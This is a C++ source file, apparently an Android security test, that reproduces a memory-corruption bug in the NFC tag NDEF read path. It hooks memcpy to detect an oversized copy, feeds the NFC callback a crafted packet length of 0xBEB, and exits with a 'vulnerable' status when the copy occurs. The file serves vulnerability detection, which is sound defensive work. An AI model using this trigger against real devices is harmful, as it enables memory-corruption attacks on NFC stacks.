1 /*
2 * Copyright (C) 2021 The Android Open Source Project
3 *
4 * Licensed under the Apache License, Version 2.0 (the "License");
5 * you may not use this file except in compliance with the License.
6 * You may obtain a copy of the License at
7 *
8 * http://www.apache.org/licenses/LICENSE-2.0
9 *
10 * Unless required by applicable law or agreed to in writing, software
11 * distributed under the License is distributed on an "AS IS" BASIS,
12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 * See the License for the specific language governing permissions and
14 * limitations under the License.
15 */
16
17 #include <dlfcn.h>
18 #include <nfa_rw_int.h>
19 #include <nfc_int.h>
20 #include <rw_int.h>
21 #include <stdlib.h>
22 #include "../includes/common.h"
23
24 #define LENGTH 0xBEB
25
26 extern tRW_CB rw_cb;
27 extern tNFC_CB nfc_cb;
28 void rw_init(void);
29 void NFA_Init(tHAL_NFC_ENTRY *p_hal_entry_tbl);
30 bool nfa_rw_activate_ntf(tNFA_RW_MSG *p_data);
31
32 bool isInitialized = false;
33
34 static void *(*real_memcpy)(void *to, const void *from, size_t numBytes) = nullptr;
35
init(void)36 void init(void) {
37 real_memcpy = (void *(*)(void *, const void *, size_t))dlsym(RTLD_NEXT, "memcpy");
38 if (real_memcpy == nullptr) {
39 return;
40 }
41 isInitialized = true;
42 }
43
memcpy(void * to,const void * from,size_t numBytes)44 void *memcpy(void *to, const void *from, size_t numBytes) {
45 if (!isInitialized) {
46 init();
47 }
48 if (numBytes == LENGTH) {
49 exit(EXIT_VULNERABLE);
50 }
51 return real_memcpy(to, from, numBytes);
52 }
53
freeResourcesAndReturn(int status,tNFA_RW_MSG * ptr1=nullptr,tNFC_ACTIVATE_DEVT * ptr2=nullptr,tRW_DATA * ptr3=nullptr,NFC_HDR * ptr4=nullptr,uint8_t * ptr5=nullptr)54 int freeResourcesAndReturn(int status, tNFA_RW_MSG *ptr1 = nullptr,
55 tNFC_ACTIVATE_DEVT *ptr2 = nullptr, tRW_DATA *ptr3 = nullptr,
56 NFC_HDR *ptr4 = nullptr, uint8_t *ptr5 = nullptr) {
57 if (ptr1) {
58 if (ptr2) {
59 free(ptr2);
60 }
61 free(ptr1);
62 }
63 if (ptr3) {
64 if (ptr4) {
65 free(ptr4);
66 }
67 free(ptr3);
68 }
69 if (ptr5) {
70 free(ptr5);
71 }
72 return status;
73 }
74
main()75 int main() {
76 GKI_init();
77 rw_init();
78 tHAL_NFC_ENTRY p_hal_entry_tbl;
79 NFA_Init(&p_hal_entry_tbl);
80
81 tNFA_RW_MSG *p_data = (tNFA_RW_MSG *)malloc(sizeof(tNFA_RW_MSG));
82 if (!p_data) {
83 return EXIT_FAILURE;
84 }
85 p_data->activate_ntf.p_activate_params =
86 (tNFC_ACTIVATE_DEVT *)malloc(sizeof(tNFC_ACTIVATE_DEVT));
87 if (!(p_data->activate_ntf.p_activate_params)) {
88 return freeResourcesAndReturn(EXIT_FAILURE, p_data);
89 }
90
91 tNFC_ACTIVATE_DEVT *p_activate_params = p_data->activate_ntf.p_activate_params;
92 p_activate_params->protocol = NFC_PROTOCOL_T2T;
93
94 nfa_rw_activate_ntf(p_data);
95
96 tRW_CBACK *p_cback = rw_cb.p_cback;
97 tRW_DATA *p_rw_data = (tRW_DATA *)malloc(sizeof(tRW_DATA));
98 if (!p_rw_data) {
99 return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params);
100 }
101
102 nfa_rw_cb.cur_op = NFA_RW_OP_READ_NDEF;
103 p_rw_data->data.p_data = (NFC_HDR *)malloc(sizeof(NFC_HDR));
104 if (!(p_rw_data->data.p_data)) {
105 return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params,
106 p_rw_data);
107 }
108
109 nfa_rw_cb.p_ndef_buf = (uint8_t *)malloc(sizeof(uint8_t));
110 if (!(nfa_rw_cb.p_ndef_buf)) {
111 return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params,
112 p_rw_data, p_rw_data->data.p_data);
113 }
114
115 p_rw_data->data.p_data->len = LENGTH;
116 if (p_cback) {
117 p_cback(RW_T3T_CHECK_EVT, p_rw_data);
118 }
119
120 return freeResourcesAndReturn(EXIT_SUCCESS, p_data, p_data->activate_ntf.p_activate_params,
121 p_rw_data, p_rw_data->data.p_data, nfa_rw_cb.p_ndef_buf);
122 }
123